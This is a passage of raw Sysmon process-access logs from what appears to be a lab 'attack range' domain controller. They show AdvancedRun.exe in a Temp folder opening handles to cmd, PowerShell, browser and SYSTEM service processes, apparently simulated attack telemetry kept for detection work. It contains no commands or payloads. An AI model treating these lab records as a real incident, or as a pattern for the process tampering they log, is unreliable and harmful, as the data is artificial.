un\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+48ce|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+3bc2|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+557b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+39a0|C:\Windows\System32\USER32.dll+2d2d3(wow64)|C:\Windows\System32\USER32.dll+1dd15(wow64)|C:\Windows\System32\USER32.dll+1d380(wow64)|C:\Windows\System32\USER32.dll+1d2a4(wow64)ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000004077901Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:16:35.055{834264DD-14A0-61EB-9208-000000002702}60163328C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-0F7E-61EB-C807-000000002702}3452C:\Program 
Files\OpenJDK\jdk-17.0.1\bin\java.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+48ce|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+3bc2|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+557b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+39a0|C:\Windows\System32\USER32.dll+2d2d3(wow64)|C:\Windows\System32\USER32.dll+1dd15(wow64)|C:\Windows\System32\USER32.dll+1d380(wow64)|C:\Windows\System32\USER32.dll+1d2a4(wow64)ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000004077900Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
20:16:35.054{834264DD-14A0-61EB-9208-000000002702}60163328C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-0F7E-61EB-C707-000000002702}2228C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+48ce|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+3bc2|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+557b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+39a0|C:\Windows\System32\USER32.dll+2d2d3(wow64)|C:\Windows\System32\USER32.dll+1dd15(wow64)|C:\Windows\System32\USER32.dll+1d380(wow64)|C:\Windows\System32\USER32.dll+1d2a4(wow64)ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000004077899Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
20:16:35.054{834264DD-14A0-61EB-9208-000000002702}60163328C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-0F7E-61EB-C607-000000002702}2224C:\Windows\system32\cmd.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+48ce|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+3bc2|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+557b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+39a0|C:\Windows\System32\USER32.dll+2d2d3(wow64)|C:\Windows\System32\USER32.dll+1dd15(wow64)|C:\Windows\System32\USER32.dll+1d380(wow64)|C:\Windows\System32\USER32.dll+1d2a4(wow64)ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000004077898Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
20:16:35.053{834264DD-14A0-61EB-9208-000000002702}60163328C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-003D-61EB-F905-000000002702}2420C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+48ce|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+3bc2|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+557b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+39a0|C:\Windows\System32\USER32.dll+2d2d3(wow64)|C:\Windows\System32\USER32.dll+1dd15(wow64)|C:\Windows\System32\USER32.dll+1d380(wow64)|C:\Windows\System32\USER32.dll+1d2a4(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000004077897Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
20:16:35.053{834264DD-14A0-61EB-9208-000000002702}60163328C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-003D-61EB-F805-000000002702}2928C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+48ce|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+3bc2|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+557b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+39a0|C:\Windows\System32\USER32.dll+2d2d3(wow64)|C:\Windows\System32\USER32.dll+1dd15(wow64)|C:\Windows\System32\USER32.dll+1d380(wow64)|C:\Windows\System32\USER32.dll+1d2a4(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000004077896Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
20:16:35.052{834264DD-14A0-61EB-9208-000000002702}60163328C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-003D-61EB-F705-000000002702}6000C:\Windows\System32\cmd.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+48ce|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+3bc2|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+557b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+39a0|C:\Windows\System32\USER32.dll+2d2d3(wow64)|C:\Windows\System32\USER32.dll+1dd15(wow64)|C:\Windows\System32\USER32.dll+1d380(wow64)|C:\Windows\System32\USER32.dll+1d2a4(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000004077895Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
20:16:35.052{834264DD-14A0-61EB-9208-000000002702}60163328C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-FE61-61EA-B805-000000002702}4372C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+48ce|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+3bc2|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+557b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+39a0|C:\Windows\System32\USER32.dll+2d2d3(wow64)|C:\Windows\System32\USER32.dll+1dd15(wow64)|C:\Windows\System32\USER32.dll+1d380(wow64)|C:\Windows\System32\USER32.dll+1d2a4(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000004077894Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
20:16:35.052{834264DD-14A0-61EB-9208-000000002702}60163328C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-FE61-61EA-B705-000000002702}5548C:\Windows\System32\cmd.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+48ce|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+3bc2|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+557b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+39a0|C:\Windows\System32\USER32.dll+2d2d3(wow64)|C:\Windows\System32\USER32.dll+1dd15(wow64)|C:\Windows\System32\USER32.dll+1d380(wow64)|C:\Windows\System32\USER32.dll+1d2a4(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000004077893Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
20:16:35.052{834264DD-14A0-61EB-9208-000000002702}60163328C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-FE2D-61EA-B005-000000002702}108C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+48ce|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+3bc2|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+557b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+39a0|C:\Windows\System32\USER32.dll+2d2d3(wow64)|C:\Windows\System32\USER32.dll+1dd15(wow64)|C:\Windows\System32\USER32.dll+1d380(wow64)|C:\Windows\System32\USER32.dll+1d2a4(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000004077892Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
20:16:35.051{834264DD-14A0-61EB-9208-000000002702}60163328C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-FE2D-61EA-AF05-000000002702}5296C:\Windows\System32\cmd.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+48ce|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+3bc2|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+557b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+39a0|C:\Windows\System32\USER32.dll+2d2d3(wow64)|C:\Windows\System32\USER32.dll+1dd15(wow64)|C:\Windows\System32\USER32.dll+1d380(wow64)|C:\Windows\System32\USER32.dll+1d2a4(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000004077891Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:16:35.051{834264DD-14A0-61EB-9208-000000002702}60163328C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-F392-61EA-4B04-000000002702}948C:\Program Files (x86)\Internet 
Explorer\IEXPLORE.EXE0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+48ce|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+3bc2|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+557b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+39a0|C:\Windows\System32\USER32.dll+2d2d3(wow64)|C:\Windows\System32\USER32.dll+1dd15(wow64)|C:\Windows\System32\USER32.dll+1d380(wow64)|C:\Windows\System32\USER32.dll+1d2a4(wow64)ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000004077890Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:16:35.051{834264DD-14A0-61EB-9208-000000002702}60163328C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-F392-61EA-4A04-000000002702}5408C:\Program Files\Internet 
Explorer\iexplore.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+48ce|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+3bc2|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+557b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+39a0|C:\Windows\System32\USER32.dll+2d2d3(wow64)|C:\Windows\System32\USER32.dll+1dd15(wow64)|C:\Windows\System32\USER32.dll+1d380(wow64)|C:\Windows\System32\USER32.dll+1d2a4(wow64)ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000004077889Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
20:16:35.044{834264DD-14A0-61EB-9208-000000002702}60163328C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAF5-61EA-3A00-000000002702}2668C:\Windows\System32\smbhash.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+48ce|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+3bc2|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+557b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+39a0|C:\Windows\System32\USER32.dll+2d2d3(wow64)|C:\Windows\System32\USER32.dll+1dd15(wow64)|C:\Windows\System32\USER32.dll+1d380(wow64)|C:\Windows\System32\USER32.dll+1d2a4(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000004077863Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
20:16:35.044{834264DD-14A0-61EB-9208-000000002702}60163328C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAF5-61EA-3900-000000002702}2664C:\Windows\System32\ismserv.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+48ce|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+3bc2|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+557b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+39a0|C:\Windows\System32\USER32.dll+2d2d3(wow64)|C:\Windows\System32\USER32.dll+1dd15(wow64)|C:\Windows\System32\USER32.dll+1d380(wow64)|C:\Windows\System32\USER32.dll+1d2a4(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000004077862Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
